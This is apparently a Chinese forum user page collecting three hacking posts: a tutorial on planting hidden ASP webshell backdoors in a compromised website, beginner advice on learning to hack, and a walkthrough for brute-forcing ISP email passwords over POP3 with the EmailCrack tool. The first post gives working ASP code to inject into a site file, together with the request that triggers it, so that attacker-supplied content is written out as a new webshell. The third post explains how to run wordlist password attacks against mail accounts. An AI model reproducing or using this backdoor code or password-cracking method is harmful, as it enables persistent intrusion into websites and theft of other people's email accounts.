夏天里de凉茶 夏天里de凉茶
关注数: 0 粉丝数: 153 发帖数: 1,993 关注贴吧数: 6
巧妙利用.mdb后缀数据库做后门 引言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好"佛高一尺,我高一丈"。我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦copy 文件名/参数 + 文件名/参数 生成文件名这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到一个webshell之后... 我们所知道的,很多站点在用户注册的时候要让填好多东西例如:用户名、密码、QQ、邮箱、个人简介、电话、联系方式、住址一类的而对应到数据库中也都会有相应的表 字段 值我今天要做的就是 我注册一个用户在 我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下废话少说了 大家看代码<%if request("action")="firefox" then fname=request.querystring("fn")tname=request.querystring("tn")bname=request.querystring("bn")id=request.querystring("id")idvalue=request.querystring("idv")set rs=server.createobject("ADODB.recordset")sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""rs.open sql,conn,1,3if not rs.eof thencontent=rs(bname)elseresponse.write "Nothing"end ifset fso=Server.createObject("Scripting.FileSystemObject")set txtfile=fso.createtextfile(server.mappath(fname))txtfile.writeline(content)txtfile.closeend if%>将上边的代码加到站点的一个文件中 如news.asp根据我们了解的信息 在其站点注册后 下载数据库看结构我注册的firefox名字是在 user表 其id值为119 用于存放我注册简历的表字段为jl那么在使用的时候我们news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119就可以在news.asp相同目录下写入一个名为 firefox.asp的webshell以上可以说是万千隐藏方法中的一种 下边再说另外一种更方便的隐藏方法这个方法就和mdb后缀无关系了同样我们还是修改news.asp 将以下代码插入到对方news.asp中<%if request("action")="firefox" then n=request.form("n")c=request.form("c")set fso=Server.createObject("Scripting.FileSystemObject")set txtfile=fso.createtextfile(server.mappath(n))txtfile.writeline(c)txtfile.closeend if%>这段代码相对简单些 算是一个木马的服务端吧使用的时候以这段代码配合 F.s.t火狐技术联盟[www.wrsky.com] Name: Shell: 将以上代码中的http://localhost/config.asp?action=firefox替换成你的服务端地址 然后保存为本地的.htm文件 本地打开后定义要生成的文件名 文件内容 远程提交 ok 又是一种留后门的方法此文没有太高的技术含量 技术交流可以到www.wrsky.com还望各为大牛多多提携 巧妙利用.mdb后缀数据库做后门
新人0起步接触黑客-3《学习方法》 今天有许多人问我:“我看了你的文章了,但是我是新人,有没有什么学习方法啊?”我回答的是;“当然有啊,不过人和人不同,方法是自己总结出来的,就和我前面文章中介绍的名词一样,都是我在学习中根据自己的经验和对他的认识总结出来的。”下面呢我就把我自己的学习经验写出来给大家参考下,大家可以根据我的方法去总结套适合自己的学习方法,这样对我们的进步很有必要,有了一个系统化的方法后,相信进步就不是一个困难的事情了。 初学HACK,首先有几点忠告: 1、就是不要以自己年龄下为借口,我以前一个学生就是学不会东西是就以自己年龄小为学不会的借口,我可以确切的说,年龄小并不是什么缺点,你会长大的,而正因为你年龄下,可以学到的东西才更多。 2、不要什么问题都问,这个也许有人不理解,为什么这么说呢?因为前不久有个文章名字叫《提问的智慧》相信大家都看过了吧(什么?你没有看?倒了,快去看去!)。里面写的东西很值得大家学习,特别是里面介绍的一个方法,就是把 baidu或google当老师,有问题就问他,相信你在问他的时候比去论坛问别人来的快。 3、不要三天热度,这个我见的很多,身边有许多朋友都是这样的,看到我有点小的成就和想学习HACK,然后学不会就说这个没有意思,这个是一个大错误。不是你学不会,是你懒的学,怕吃苦,哪里有学习3天就成HACKER的人,我是没有见过,许多有成绩的HACKER都是用自己的努力才换来的自己的成绩。还有,学习黑客时一定不能着急,一个问题不能解决时不要放弃,试着用其他方法看能达到自己的目的不,有时为了得到一个服务器权限要让服务器重起,需要等待好几天(除非你DDOS他可能快点)。 好了,下面介绍下学习方法: 1、首先要有本学习材料,大家可以通过《黑客X档案》 《黑客防线》《非安全》还有到我们黑基来学习,有许多人说,看不懂,里面东西太深奥了怎么办?我的回答是:“看不懂也要看,一便不懂看两便,甚至更多,没有人生下来就会走路。再不懂就问。”在我开始学习的时候,是看书,看了一便后一头雾水,什么都不懂,就坚持看下去,看了几个月后,觉得许多东西都自然明白是什么东西了。后来只要看到标题就大概能猜出文章里涉及的内容了。所以看书很必要,但有不能一切都相信书上写的,计算机这门科学是最注重实践的了,看到文章的内容吸引你,就去找个环境实践下吧,有条件要上,没有条件创造条件也要上。 2、就是定向自己要学习的内容,一直坚持的学下去,适当的时候学点其他的,就和大学里没有人有不同的专业一样,主要功自己的专业,然后学习其他的东西,比如你喜欢入侵网站,就多学点脚本。喜欢入侵个人,就学点远程溢出,配置木马什么的。喜欢编程,就选择个自己喜欢的语言学习下去,新人建议学习VB,C/C++也不错。 3、多去论坛看帖子,看自己懂的,不懂的,回答自己懂的问题,因为在你回答自己懂的问题的同时,自己加深了对这个问题的认识,因为别人能听懂你说的是什么时才说明你自己真正理解了这个问题。当碰到自己不懂的问题时,先试图自己找出问题的答案,(google啊)然后试着回答这个你自己不懂的问题。 4、多认识朋友,因为有的问题解决不了时问下朋友,他可能能帮你解决,因为2个人的思维比一个人的强大点,能考虑到的东西也多了。 5、不要盲目拜师,我不反对拜师,因为我也有师父,也需要拜师。但建议你在拜师前一定要知道你的师父擅长什么,比如你要学入侵个人主机,找了个脚本入侵强的师父当然不行。还有师父只是个指引我们学习的人,所有的东西还是要靠我们自己学习,把不懂的东西找师父一起解决,懂的东西自己多练习,然后不断学习新的知识,否则你讲会被淘汰。 以上就是我对学习的一点建议,今天头脑有点混乱,可能文章写的不太好,希望大家见谅,最后本人希望各位都能展翅高飞,脱离菜鸟!
邮箱密码破解EmailCrack使用   现在你去ISP处开户上网,他们一般都会给你一个邮箱,地址一般是你的帐号@xxx.net,密码和你的上网密码一样,也就是说,只要你能敲开邮箱的密码就一切OK了。   这样的话,运行那些密码破解软件,如EmailCrack或网络刺客,配合字典文件慢慢等着,一般也要破解几十个小时吧。   这种软件必须在连线状态下使用,适用于取得有邮箱的用户之密码。前提是你必须有一个目标主机的帐号。   EmailCrack是一个基于POP3协议的自动登录机,它可以利用POP3协议的功能,对可能的用户密码进行登录试验,从而获得用户的密码。   其操作方法很简单,我们就来试试吧!   首先拨号上网,连接到Internet后,运行EmailCrack,出现主界面。 在“server address”(服务器地址)输入框中输入要连接的主机地址,一般都是输入POP3服务器地址,当然也可以输入IP地址和域名地址都可以(经过实验,输入IP地址连接的速度最快)。   在“user list file”(用户名列表文件)输入框中直接输入用户列表文件所在的盘符、路径和文件名,或者用鼠标单击“user list file”按钮,在“打开”对话框中直接双击要选择的文件。   在“password list file”(口令列表文件)输入框中直接输入口令列表文件所在的盘符、路径和文件名,或者用鼠标单击“password list file”按钮,在“打开”对话框中直接双击要选择的文件。   这里请注意一下:用户列表文件的格式是普通的文本格式,要求一行一个用户,不能用主机上拉下来的passwd文件直接使用,必须将passwd文件中的其他信息除去后使用。   “Try User name”(用户名尝试)复选项可以让你决定程序是否使用用户的帐号作为密码登录。   在“Thread Number”(线程数目)文本输入框中,你可以自己输入程序同时打开的线程数目。   一切设置好以后,用鼠标单击“Begin”按钮,程序会自动使用密码列表中的密码测试每一个帐号,如果成功,程序将会把用户名显示到结果框中,其中“Search”为已试的个数,“Get”为取到密码的个数,结果会自动保存在文件Result.txt中。   EmailCrack实际上只是一个按照输入参数进行机械试验的密码破解软件。不过,这个方法对于以用户名或简单数字、字母作为密码的用户有效
1 下一页